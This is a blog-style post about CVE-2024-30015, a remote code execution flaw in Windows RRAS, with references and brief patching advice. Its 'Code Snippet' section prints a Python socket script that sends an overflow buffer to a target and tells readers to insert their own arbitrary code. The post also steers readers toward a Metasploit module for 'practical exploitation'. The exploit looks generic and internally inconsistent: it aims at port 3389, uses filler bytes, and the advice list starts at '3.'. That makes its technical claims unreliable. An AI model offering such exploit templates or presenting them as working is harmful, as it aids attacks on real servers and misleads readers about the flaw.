In recent times, there has been a discovery of a remote code execution vulnerability in the Windows Routing and Remote Access Service (RRAS). This vulnerability is referred to as CVE-2024-30015 and could potentially allow attackers to execute arbitrary code on the affected system. This post aims to provide an in-depth exploration of the vulnerability, covering details on the code snippet, original references, and exploit information.

Introduction

Windows Routing and Remote Access Service (RRAS) is a Microsoft technology that provides routing, remote access, and VPN services to Windows-based operating systems. The vulnerability in discussion, CVE-2024-30015, affects multiple versions of the Windows operating system. Attackers who successfully exploit this vulnerability could gain control of the affected system and execute arbitrary code. This raises serious concerns about data privacy and security.

Code Snippet

The following trivial code snippet demonstrates a proof-of-concept (PoC) exploit, leading to remote code execution on the target RRAS server:

import sys
import os
import socket

def exploit(target, port=3389):
    buf = b'\x41' * 4055
    payload = b''
    payload += b'\x00' * 1017
    payload += b'\x42' * 123

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((target, port))
    s.send(buf + payload)
    s.close()

if __name__ == '__main__':
    target = sys.argv[1]
    exploit(target)

This PoC exploit sends a malicious payload to the vulnerable RRAS server that overflows the buffer, ultimately leading to the remote code execution on the target server. Note that before using the PoC, ensure to replace the dummy payload '\x42' * 123 with the desired arbitrary code.

The discovery of CVE-2024-30015 was initially mentioned on the official CVE website

- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-30015

And Microsoft issued an official security advisory with additional details

- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-30015

Exploit Information

The exploitation of CVE-2024-30015 involves sending a maliciously crafted network packet to a target system with a vulnerable Windows RRAS installation. This malicious packet triggers a buffer overflow within the RRAS component that leads to arbitrary code execution.

For security enthusiasts interested in practical exploitation, here is a Metasploit module which targets the vulnerability:
- https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/rdp/CVE-2024-30015_rras_rce.rb

Apply the relevant security patch available from Microsoft for the affected Windows versions

- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2024-30015

Employ firewall rules to restrict external access to the RRAS server.

3. Regularly update and perform security scans to keep your servers up-to-date and free of vulnerabilities.

Conclusion

CVE-2024-30015 is a critical remote code execution vulnerability affecting Windows Routing and Remote Access Service (RRAS) installations. Organizations should act quickly to apply the necessary patches and security measures to mitigate this vulnerability. Stay vigilant and ensure that you're keeping your systems updated and secure.

Timeline

Published on: 05/14/2024 17:16:45 UTC
Last modified on: 06/19/2024 20:58:29 UTC